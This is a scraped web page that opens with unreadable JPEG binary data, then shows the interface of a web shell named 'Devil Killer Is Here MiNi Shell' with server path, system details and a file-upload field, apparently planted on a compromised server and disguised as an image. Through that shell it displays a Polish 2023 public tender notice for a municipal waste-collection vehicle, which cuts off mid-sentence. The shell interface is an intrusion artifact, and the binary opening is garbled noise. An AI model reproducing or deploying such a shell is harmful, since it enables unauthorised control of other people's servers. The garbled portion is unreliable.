JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230221/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230221/0010330401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup samochodu do zbierania segregowanych odpadów komunalnych <br/>z terenów rekreacyjnych Gminy Dobiegniew </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Usług Komunalnych „KOMUNALNI” Spółka z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210019445</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poznańska 8a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobiegniew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-520</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@komunalnidobiegniew.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://komunalnidobiegniew.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup samochodu do zbierania segregowanych odpadów komunalnych <br/>z terenów rekreacyjnych Gminy Dobiegniew </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5d48a04e-b1b9-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00103304</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00029492/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Samochód dostawczy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie realizowane w ramach Programu Operacyjnego „Rybactwo i Morze” na lata 2014 – 2020&#34; </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5d48a04e-b1b9-11ed-b8d9-2a18c1f2976f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami:<br/>Pan Sławomir Zalewski, e-mail: slawomir.zalewski@komunalnidobiegniew.pl<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>slawomir.zalewski@komunalnidobiegniew.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca&#34; na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy&#34;.<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze&#34; („Formularze do<br/>komunikacji&#34;). Za pośrednictwem „Formularzy do komunikacji&#34; odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik&#34;).<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>13. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji&#34; w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy&#34; na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji&#34; służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>14. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja&#34;.<br/>15. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji&#34; wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>16. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>17. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art.13 RODO w przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>Ogłoszenie nr 2023/BZP 00074328 z dnia 2023-02-01<br/>2023-02-01 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Przedsiębiorstwo Usług Komunalnych „Komunalni” Spółka z o.o.” siedzibą<br/>przy ul. Poznańska 8a, 66-520 Dobiegniew, tel./fax 95 76 11 054, adres poczty elektronicznej: sekretariat@komunalnidobiegniew.pl,<br/>adres strony internetowej: www.komunalnidobiegniew.pl<br/>􀀀 kontakt z inspektorem ochrony danych osobowych (IDO): e-mail: slawomir.zalewski @komunalnidobiegniew.pl<br/>tel. 95 76 11 052<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego pn.„Sukcesywna dostawa opału transportem kołowym dla Przedsiębiorstwa Usług Komunalnych<br/>„KOMUNALNI” Spółka z o.o. w Dobiegniewie w okresie grzewczym 2021/2022<br/>odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>(komisja przetargowa) oraz odpowiednie organy kontroli w zakresie ich kompetencji;<br/>􀀀 dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane te mogą być przechowywane<br/>przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach<br/>(t.j. Dz. U. z 2018 r. poz. 217 z późn. zm.) i przepisów wykonawczych do tej ustawy;<br/>􀀀 obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>􀀀 w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>2. Prawa osób których dane są przetwarzane:<br/>􀀀 prawo dostępu do danych osobowych;<br/>􀀀 prawo do sprostowania danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania);<br/>􀀀 prawo żądania od administratora ograniczenia przetwarzania danych osobowych (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>􀀀 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy;<br/>􀀀 nie przysługuje Pani/Panu:<br/>• prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych;<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest<br/>konieczność wypełnienia obowiązku prawnego ciążącego na zamawiającym lub wykonanie umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zakup na potrzeby Zamawiającego jednego kompletnego nowego fabrycznie samochodu<br/>specjalistycznego (rok produkcji 2022 r. lub później) do odbioru odpadów komunalnych (podwozie i zabudowa)<br/>wyposażonego w co najmniej:<br/>1. Skrzynia z wywrotką jednostronną osiatkowaną, siłownik hydrauliczny, sterowanie elektryczne:<br/>- wymiary skrzyni: 4000 mm x 2150 mm x 2000 mm,<br/>- otwierana tył wraz z wywrotem,<br/>- podłoga – sklejka w/o gr. 15mm<br/>- oświetlenie boczne obrysowe – diody<br/>- nadstawki z siatki do wys. 2000mm<br/>- boki osiatkowane zdejmowane z otwieranymi drzwiczkami do załadunku po 2 z każdej strony, zamykane na zatrzask, tylna<br/>burta otwierana niezależnie od zabudowy, tylne drzwiczki dzielone na pół otwierane na boki powyżej burty aluminiowej<br/>- haczyki/zaczepy zamontowane na osiatkowaniu/ramach do naciągania siatki zabezpieczającej ładunek, - burta pełna wysokość ok. 400 mm, otwierana,<br/>- belka tylna, kosz na koło zapasowe wraz z systemem podtrzymującym koło zapasowe,<br/>- zawieszenie wzmocnione do ciężkich zabudów,<br/>- pełnowymiarowe koło zapasowe,<br/>- korek wlewu paliwa zamykany na klucz.<br/>- pomarańczowe oświetlenie stroboskopowe w atrapie z przodu i w zderzaku z tyłu<br/>- hak holowniczy + podłączenie<br/>- skrzynka narzędziowa 1 szt. „500”<br/>2. Kabina samochodu<br/>- trzy osobowa, z dwumiejscowym siedzeniem pasażerów,<br/>- fotel kierowcy z regulacją wysokości,<br/>- podłokietnik i regulacja lędźwiowa siedzenia kierowcy,<br/>- zagłówki z regulacją wysokości,<br/>- tapicerka w kolorze grafitowym, szarym lub czarnym,<br/>- bezwładnościowe 3-punktowe pasy bezpieczeństwa przy wszystkich fotelach,<br/>- instalacja do radia, GPS, sygnalizacji świetlnej zewnętrznej „Kogut”, USB<br/>- radio – MP3,<br/>- sygnalizacja świetlna typu „Kogut”(stroboskopy),<br/>- klimatyzacja manualna,<br/>- centralny zamek,<br/>- szyby przednie sterowane elektrycznie,<br/>- szyby atermiczne,<br/>- boczne lusterka na wysięgniku ok. 2200mm,<br/>- boczne lusterka regulowane elektrycznie i podgrzewane,<br/>- półka pod sufitem<br/>- kolumna kierownicy z regulacją wysokości,<br/>- wspomaganie kierownicy,<br/>- poduszki powietrzne kierowcy i pasażerów,<br/>- światła do jazdy dziennej halogenowe,<br/>- filtr paliwa ogrzewany,<br/>- blow by podgrzewany,<br/>- system ESC (ABS + EBD + HBA + ASR + MSR + ESC + Hill Holder)<br/>- poduszki pneumatyczne z kompresorem w kabinie kierowcy,<br/>- spojler dachowy + owiewki boczne<br/>3. Dane techniczne:<br/>- norma emisji spalin –Euro 6<br/>- moc silnika: 140 – 170 KM,<br/>- pojemność silnika: 2,2 cm3 – 2,9 cm3,<br/>- dopuszczalna masa całkowita 3500 kg,<br/>- ładowność użytkowa – ok. 1550 kg,<br/>- liczba cylindrów – do 6,<br/>- zapłon samoczynny,<br/>- zasilenie wtrysk bezpośredni, z turbosprężarką i intercoolerem,<br/>- zużycie paliwa: 6,00 – 10,00 l/ 100 km,<br/>- układ kierowniczy ze wspomaganiem,<br/>- liczba biegów: do 6 + wsteczny,<br/>- sprzęgło: jednotarczowe, hydrauliczne,<br/>-napęd: przedni,<br/>- układ hamulcowy: hamulce tarczowe, dwuobwodowy układ hamulcowy, ABS z EBD,<br/>- zawieszenie: przednie - z wahaczami przytwierdzonymi do belki pomocniczej, sprężynami spiralnymi, amortyzatorami<br/>teleskopowymi i drążkiem stabilizującym; tylne – sztywny most rurowy z parabolicznymi resorami piórowymi, amortyzatorami<br/>teleskopowymi, elastycznymi bocznymi odbojnikami i drążkiem stabilizującym,<br/>- zbiornik paliwa o pojemności min. 90 l,<br/>- koła: ogumienie 215/75 R 16 C, komplet opon letnich i zimowych, z pełnowymiarowym kołem zapasowym,<br/>- hak holowniczy ze zdejmowanym zaczepem i instalacją.<br/>2. Samochód musi spełniać wymagania przepisów prawa obowiązujących na terenie Rzeczypospolitej Polskiej w zakresie<br/>dopuszczenia pojazdów do ruchu drogowego.<br/>Samochód musi spełniać polskie i europejskie wymogi w zakresie bezpieczeństwa oraz wymagania poruszania się po<br/>drogach publicznych, zgodnie z przepisami ustawy z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz.U. z 2021 r.<br/>poz. 450 z późn. zm.)<br/>Samochód musi posiadać homologację wystawioną zgodnie z przepisami Rozdziału 1a ustawy z dnia 20 czerwca 1997 r.<br/>Prawo o ruchu drogowym z 2021 r. poz. 450 z późn. zm.). Zamawiający wymaga, aby wykonawca dysponował co najmniej jedną własną lub autoryzowaną przez wykonawcę stacją<br/>serwisową zlokalizowaną w odległości nie większej niż 60 km. od siedziby Zamawiającego w Dobiegniewie, przy czym na<br/>potrzeby określenia tej odległości przyjmowana będzie każdorazowo przez Zamawiającego najkrótsza możliwa odległość<br/>pomiędzy siedzibą Zamawiającego a stacją serwisową liczona po sieci dróg publicznych dopuszczalnych dla ruchu<br/>zaoferowanych samochodów, z zastrzeżeniem iż ze względu na stale zmieniającą się sieć istniejących dróg publicznych<br/>dopuszczalnych dla ruchu zaoferowanych samochodów Zamawiający uzna za mieszczące się w określonych w Specyfikacji<br/>Warunków Zamówienia odległościach od siedziby Zamawiającego stacje serwisowe zlokalizowane w odległościach do 5 km.<br/>większych niż wskazane przez Zamawiającego jako graniczne w ramach warunku udziału w postępowaniu.<br/>Zamawiający informuje, że odbiór samochodu nastąpi w siedzibie Wykonawcy.<br/>Uwaga:<br/>Zamawiający wymaga, aby wykonawca w składanej ofercie zawarł oświadczenie (załącznik nr 2 do SWZ) w sprawie<br/>dysponowania co najmniej jedną własną lub autoryzowaną przez wykonawcę stacją serwisową zlokalizowaną w odległości<br/>nie większej niż 60 km. od siedziby Zamawiającego liczonych po istniejącej sieci dróg publicznych dopuszczalnych dla ruchu<br/>zaoferowanych samochodów.<br/>W dniu przekazania samochodu Zamawiającemu wykonawca przeprowadzi bez osobnego wynagrodzenia szkolenie<br/>wyznaczonych pracowników Zamawiającego z zakresu obsługi i eksploatacji samochodu oraz zainstalowanych w nim<br/>urządzeń.<br/>Wraz z przekazaniem Zamawiającemu przedmiotu dostawy wykonawca wyda Zamawiającemu instrukcje obsługi w języku<br/>polskim podwozia i zabudowy, certyfikaty i deklaracje w zakresie bezpieczeństwa zabudów oraz co najmniej dwa komplety<br/>kluczyków do samochodu, a także: apteczkę, trójkąt i gaśnicę.<br/>3. W przypadkach, kiedy w opisie przedmiotu zamówienia wskazane zostały nazwy własne, znaki towarowe, patenty,<br/>pochodzenie, źródła lub szczególne procesy, które charakteryzuje produkty lub usługi, normy, oceny techniczne<br/>specyfikacje techniczne, oznacza to, że zamawiający nie może opisać przedmiotu zamówienia wystarczająco precyzyjnie i<br/>w zrozumiały sposób. W takich sytuacjach ewentualne wskazania na znaki towarowe, patenty, pochodzenie, źródło lub<br/>szczególny proces, należy odczytywać z wyrazami „lub równoważne” (szczegóły w tym zakresie zostały wskazane w opisie<br/>przedmiotu zamówienia).<br/>4. W sytuacjach, kiedy Zamawiający opisuje przedmiot zamówienia poprzez odniesienie do norm, europejskich ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt.2 i<br/>ust.3 ustawy PZP, dopuszcza rozwiązania równoważne opisywanym.<br/>5. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany<br/>wykazać, że oferowane przez niego materiały i urządzenia/wyroby spełniają wymagania określone przez Zamawiającego na<br/>poziomie nie niższym niż wskazany w opisie przedmiotu zamówienia.<br/>6. Wykonawca, który powołuje się na rozwiązania równoważne jest zobowiązany wykazać, że oferowane przez niego<br/>materiały/wyroby, spełniają wymagania określone przez Zamawiającego. Ciężar udowodnienia, że wyrób/materiał jest<br/>równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. W takim<br/>przypadku Wykonawca opisze opis zaproponowanych rozwiązań równoważnych w załączniku do Oferty, który powinien być<br/>na tyle szczegółowy, żeby Zamawiający przy ocenie oferty mógł ocenić spełnienie wymagań dotyczących ich parametrów<br/>technicznych oraz rozstrzygnąć, czy zaproponowane rozwiązania są równoważne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144511-3 - Pojazdy do zbierania odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">80 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, 